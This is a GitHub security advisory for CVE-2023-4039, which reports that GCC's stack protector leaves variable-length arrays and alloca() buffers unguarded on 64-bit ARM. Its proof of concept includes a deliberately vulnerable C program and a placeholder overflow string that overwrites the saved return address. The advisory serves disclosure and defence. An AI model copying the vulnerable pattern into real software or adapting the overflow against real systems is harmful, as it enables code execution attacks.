Skip to content

GCC's -fstack-protector fails to guard dynamic stack allocations on ARM64

Moderate
tchebb published GHSA-x7ch-h5rf-w2mf Sep 12, 2023

Package

GCC (C)

Affected versions

All, as of disclosure

Patched versions

None

Description

For more detailed analysis of this issue, see Red Team X's blog post about it.

GCC's stack smashing protection, which keeps attackers from exploiting stack buffer overflow bugs in code it compiles, has no effect when the vulnerable buffer is a variable-length array or alloca() allocation and the target architecture is 64-bit ARM. This issue is a mitigation weakness and is not exploitable directly. A fix is now available on GCC's mailing list. All versions of GCC are affected, so we recommend you incorporate that fix if you distribute GCC or ARM64 binaries compiled with GCC.

Vulnerability details

On AArch64 targets, GCC's stack smashing protection does not detect or defend against overflows of dynamically-sized local variables. In C, dynamically-sized variables include both variable-length arrays and buffers allocated using alloca(). GCC's AArch64 stack frames place such variables immediately below saved register values like the return address with no intervening stack guard. All versions of GCC that we tested, from 5.4.0 to trunk as of 2023-05-15, are affected.

The reason this happens for AArch64 but not for other GCC targets is because GCC's AArch64 backend lays out stack frames in an unconventional way: instead of saving the return address at the top of a frame (i.e. at the highest address, pushed before anything else) like most other backends and compilers, it saves it near the bottom of the frame, below the local variables. This comment from GCC's source documents the frame layout:

/* AArch64 stack frames generated by this compiler look like:

	+-------------------------------+
	|                               |
	|  incoming stack arguments     |
	|                               |
	+-------------------------------+
	|                               | <-- incoming stack pointer (aligned)
	|  callee-allocated save area   |
	|  for register varargs         |
	|                               |
	+-------------------------------+
	|  local variables              | <-- frame_pointer_rtx
	|                               |
	+-------------------------------+
	|  padding                      | \
	+-------------------------------+  |
	|  callee-saved registers       |  | frame.saved_regs_size
	+-------------------------------+  |
	|  LR'                          |  |
	+-------------------------------+  |
	|  FP'                          |  |
	+-------------------------------+  |<- hard_frame_pointer_rtx (aligned)
	|  SVE vector registers         |  | \
	+-------------------------------+  |  | below_hard_fp_saved_regs_size
	|  SVE predicate registers      | /  /
	+-------------------------------+
	|  dynamic allocation           |
	+-------------------------------+
	|  padding                      |
	+-------------------------------+
	|  outgoing stack arguments     | <-- arg_pointer
	|                               |
	+-------------------------------+
	|                               | <-- stack_pointer_rtx (aligned)
*/

LR' is the return address, so named because it's saved from the LR register, and is the target of nearly all stack smashing attacks. It may then seem like a feature, not a bug, to put it at a lower address than the locals: a contiguous overflow only lets an attacker write to memory past the vulnerable local, so this layout keeps the return address out of their reach! In practice though, the memory immediately past a function's stack frame is almost always another stack frame (belonging to the calling function) with its own saved LR value that the attacker can manipulate to the same effect.

You may notice that the layout above makes no mention of a stack guard. That's because GCC's architecture-independent code treats the stack guard as a local, placing it at the very top of the local area without any input from the target backend. Implicit in that placement is an assumption that locals will always occupy one contiguous region with no saved registers interspersed. But that assumption doesn't hold on AArch64: as shown in the diagram, dynamic allocations live at the very bottom of the stack frame, below the saved registers, with no intervening guard.

Dynamic allocations are just as susceptible to overflows as other locals. In fact, they're arguably more susceptible because they're almost always arrays, whereas fixed locals are often integers, pointers, or other types to which variable-length data is never written. GCC's own heuristics for when to use a stack guard reflect this, with its man page saying this about -fstack-protector (emphasis ours):

Emit extra code to check for buffer overflows … by adding a guard variable to functions with vulnerable objects. This includes functions that call "alloca", and functions with buffers larger than or equal to 8 bytes.

Proof of concept

The following C program is vulnerable to a contiguous stack overflow attack even when compiled with -fstack-protector or -fstack-protector-all:

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv) {
    if (argc != 2)
        return 1;

    // Variable-length array
    uint8_t input[atoi(argv[1])];

    size_t n = fread(input, 1, 4096, stdin);
    fwrite(input, 1, n, stdout);

    return 0;
}

We cross-compiled this program for AArch64 using Arm's GCC 12.2.Rel1 prebuilt toolchain and then ran it under QEMU, with debugging enabled, on an x86_64 host:

$ aarch64-none-linux-gnu-gcc -fstack-protector-all -O3 -static -Wall -Wextra -pedantic -o example-dynamic example-dynamic.c
$ echo -n 'DDDDDDDDPPPPPPPPFFFFFFFFAAAAAAAA' | qemu-aarch64 -g 5555 example-dynamic 8

We ask the program to make a dynamic allocation of size 8, which GCC rounds up to 16. The exploit payload mirrors the stack layout, with the eight "D"s representing the non-overflowing data, the eight "P"s padding out the actual allocation, the eight "F"s overwriting the saved frame pointer, and the eight "A"s overwriting the saved return address.

Attaching a debugger and resuming the program results in an immediate segfault with PC set to the address from our payload, showing we have full control over execution flow despite the stack guard:

$ gdb example-dynamic
GNU gdb (GDB) Fedora Linux 13.1-3.fc37
<snip>
(gdb) target remote :5555
Remote debugging using :5555
<snip>
(gdb) continue
Continuing.

Program received signal SIGBUS, Bus error.
0x0041414141414141 in ?? ()
(gdb) print/a $pc
$1 = 0x41414141414141

For comparison, the following program, which uses a fixed allocation of size 8 instead of a dynamic one, detects the overflow correctly (the "G"s in the payload overwrite the guard):

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

int main(void) {
    uint8_t input[8];

    size_t n = fread(input, 1, 4096, stdin);
    fwrite(input, 1, n, stdout);

    return 0;
}
$ aarch64-none-linux-gnu-gcc -fstack-protector-all -O3 -static -Wall -Wextra -pedantic -o example-static example-static.c
$ echo -n 'DDDDDDDDGGGGGGGG' | qemu-aarch64 example-static
*** stack smashing detected ***: terminated
Aborted (core dumped)

Severity

Moderate
4.8
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
High
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
Low
Availability
None
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

CVE ID

CVE-2023-4039

Credits